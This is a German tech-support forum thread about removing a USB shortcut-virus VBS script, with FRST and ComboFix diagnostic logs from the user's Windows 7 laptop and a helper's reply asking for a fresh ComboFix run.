(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe
==================== Registry (Whitelisted) ==================
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
==================== Internet (Whitelisted) ====================
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]
==================== Services (Whitelisted) =================
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)
==================== Drivers (Whitelisted) ====================
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
==================== NetSvcs (Whitelisted) ===================
==================== One Month Created Files and Folders ========
2014-04-20 05:20 - 2014-04-20 05:20 - 00015472 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-18 23:16 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 23:13 - 2014-04-18 23:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-20 05:20 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-18 23:13 - 02158592 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
==================== One Month Modified Files and Folders =======
2014-04-20 05:21 - 2014-04-20 05:20 - 00015472 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-20 05:20 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-20 05:20 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-20 04:51 - 2013-04-16 19:13 - 01757146 _____ () C:\Windows\WindowsUpdate.log
2014-04-20 04:46 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-20 04:46 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-20 04:46 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-20 04:42 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-20 04:41 - 2009-07-14 06:51 - 00088960 _____ () C:\Windows\setupact.log
2014-04-19 03:21 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-18 23:23 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-18 23:23 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-18 23:16 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-18 23:15 - 2010-05-11 01:15 - 00114178 _____ () C:\Windows\PFRO.log
2014-04-18 23:15 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-18 23:14 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-18 23:13 - 2014-04-18 23:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-18 23:13 - 2014-04-14 10:40 - 02158592 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe
==================== Bamital & volsnap Check =================
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
LastRegBack: 2014-03-24 00:49
==================== End Of Log ============================
|
|
20.04.2014, 18:18
| #14 |
| /// the machine /// TB-Ausbilder | Flash Drive Shortcut Virus wtbchkxbde..vbs Combofix bitte löschen und neu laden, nochmal laufen lassen und das Logfile posten.
__________________ gruß, schrauber Proud Member of UNITE and ASAP since 2009 Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM! |
|
21.04.2014, 00:46
| #15 |
| | Flash Drive Shortcut Virus wtbchkxbde..vbs Combofx-Logfile: Code:
ATTFilter ComboFix 14-04-20.01 - Franz 21.04.2014 1:06.2.4 - x64
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.49.1031.18.3764.2038 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((( Dateien erstellt von 2014-03-20 bis 2014-04-20 ))))))))))))))))))))))))))))))
.
.
2014-04-20 23:20 . 2014-04-20 23:20 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-04-18 21:16 . 2013-09-22 15:47 73266 ----a-w- c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 21:14 . 2013-09-22 15:47 73266 ----a-w- c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-16 21:46 . 2014-04-16 21:46 -------- d-----w- c:\windows\ERUNT
2014-04-16 21:07 . 2014-04-16 21:10 119512 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-04-16 21:06 . 2014-04-16 21:06 -------- d-----w- c:\program files (x86)\ Malwarebytes Anti-Malware
2014-04-16 21:06 . 2014-04-16 21:06 -------- d-----w- c:\programdata\Malwarebytes
2014-04-16 21:06 . 2014-04-03 07:51 63192 ----a-w- c:\windows\system32\drivers\mwac.sys
